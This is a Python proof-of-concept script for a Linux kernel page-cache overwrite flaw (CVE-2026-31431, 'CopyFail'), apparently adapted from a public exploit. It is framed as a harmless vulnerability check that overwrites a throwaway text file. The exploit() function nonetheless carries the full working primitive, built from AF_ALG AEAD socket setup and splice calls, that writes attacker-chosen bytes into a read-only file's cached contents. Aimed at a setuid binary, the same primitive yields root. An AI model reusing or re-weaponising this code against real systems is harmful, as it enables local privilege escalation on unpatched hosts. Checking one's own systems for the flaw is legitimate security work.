CopyFail test script without root

A more readable version of the CopyFail PoC script from Theori's GitHub. It has the setuid payload replaced with a simple text payload, so it does not produce a root shell. Reference: CVE-2026-31431.
import os
import socket
from traceback import format_tb

# A single NUL byte; multiplied below to build zero-filled key, IV and op buffers.
ZERO = bytes(1)

def exploit(file: int, offset: int, data: bytes) -> None:
    """Run one CopyFail iteration: splice ``file`` through an AF_ALG AEAD socket.

    This is the copy fail exploit itself from the original proof of
    concept, but reformatted for better readability. The statements are
    kept in their original order because the kernel-side effect depends
    on the exact sequence of socket and splice calls.

    Args:
        file: File descriptor of the target file; it is the source of the
            first ``os.splice`` call.
        offset: Byte offset inside the target that this call is aimed at; it
            only sizes the splice (``offset + 4``) and the final ``recv``.
        data: Payload chunk appended after ``b"AAAA"``; the caller in this
            script passes 4 bytes per call.

    Returns:
        None. Errors from the final ``recv`` are swallowed on purpose;
        errors from socket setup propagate to the caller (an unavailable
        algorithm surfaces from ``bind`` as ``FileNotFoundError``/ENOENT).

    The bare numbers are the Linux AF_ALG constants from ``linux/if_alg.h``:
    38 = AF_ALG, 5 = SOCK_SEQPACKET, 279 = SOL_ALG, 1 = ALG_SET_KEY,
    2 = ALG_SET_IV, 3 = ALG_SET_OP, 4 = ALG_SET_AEAD_ASSOCLEN,
    5 = ALG_SET_AEAD_AUTHSIZE, 32768 = MSG_MORE (0x8000).

    NOTE(review): the sequence this function performs from an unprivileged
    process (AF_ALG socket creation followed by splicing a regular file into
    the accepted operation socket) is what a host monitor would observe.
    """
    # Kernel crypto API user-space socket: AF_ALG (38), SOCK_SEQPACKET (5).
    aead = socket.socket(38, 5, 0)
    # Bind to the AEAD "authencesn(hmac(sha256),cbc(aes))" template. If the
    # algorithm is not available this raises FileNotFoundError (ENOENT),
    # which the caller relies on to report "aead module disabled".
    aead.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))

    # ALG_SET_KEY: an 8-byte prefix followed by 32 zero bytes (40 bytes).
    # The prefix presumably carries the authenc key parameters — confirm
    # against the kernel's authenc key format before relying on it.
    aead.setsockopt(279, 1, b"\x08\x00\x01\x00\x00\x00\x00\x10" + ZERO*32)
    # ALG_SET_AEAD_AUTHSIZE with a NULL optval and optlen 4: the kernel
    # takes the option length as the authentication tag size (4 bytes).
    aead.setsockopt(279, 5, None, 4)

    # accept() returns the operation socket that carries the actual data.
    dest, _ = aead.accept()
    # Bytes to splice: everything up to the target offset plus the 4-byte chunk.
    count = offset + 4
    # Ancillary data: ALG_SET_OP with value 0 (ALG_OP_DECRYPT), ALG_SET_IV as
    # {ivlen = 16, 16 zero IV bytes}, ALG_SET_AEAD_ASSOCLEN = 8 (the length of
    # b"AAAA" + data when data is 4 bytes). MSG_MORE tells the kernel that
    # more request data follows — the spliced bytes below.
    dest.sendmsg(
        [b"AAAA" + data],
        [(279, 3, ZERO*4), (279, 2, b"\x10" + ZERO*19), (279, 4, b"\x08" + ZERO*3)],
        32768
    )

    # Pipe used as the intermediary for the two splice calls.
    p1, p2 = os.pipe()

    # Splice `count` bytes of the target file, starting at file offset 0,
    # into the pipe, then from the pipe into the AEAD operation socket.
    os.splice(file, p2, count, offset_src=0)
    os.splice(p1, dest.fileno(), count)
    # The recv makes the kernel run the queued operation; its result is not
    # used and any error (EBADMSG from a failed tag check, etc.) is ignored.
    try:
        dest.recv(8 + offset)
    except Exception:
        pass
    # NOTE(review): aead, dest, p1 and p2 are never closed, so every call
    # leaks one socket pair and one pipe until the process exits.

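# Write an example file we want to be compromised by the exploit
# This file serves no purpose and is a plain text file, so no harm done
TEST_FILE = "check_copy_fail.txt"
with open(TEST_FILE, mode="w+b") as f1:
    f1.write(b"I'm Fine! :)")

# Run the exploit on the test file
# This will overwrite the file content in the page cache
# The target is opened read-only (os.O_RDONLY, the flag value 0 used in the
# original), so a changed content afterwards cannot come from a regular write
# on this descriptor.
payload = b"Vulnerable!!"
f2 = os.open(TEST_FILE, os.O_RDONLY)
try:
    try:
        # One exploit() call per 4-byte chunk of the payload, at that chunk's offset.
        for i in range(0, len(payload), 4):
            exploit(f2, i, payload[i:i + 4])
    except FileNotFoundError as e:
        # AF_ALG reports an unavailable algorithm as ENOENT. Other failures
        # (no AF_ALG support at all, for example) still propagate; the finally
        # clauses below keep the fd closed and the test file removed in that case.
        print("The exploit reported:")
        print("\n".join(format_tb(e.__traceback__)).rstrip())
        print(f"{e.__class__.__name__}: {e!s}")
        print("The aead module seems to be disabled.")
    finally:
        os.close(f2)

    # Now, check the content of the file:
    # - If the system is vulnerable, the print should return "Vulnerable!!"
    # - If the system is patched, the print should return the real content of the file, which is "I'm Fine! :)"
    with open(TEST_FILE) as f3:
        print(f3.read())
finally:
    # Delete the file afterwards, even when the exploit or the check raised.
    os.unlink(TEST_FILE)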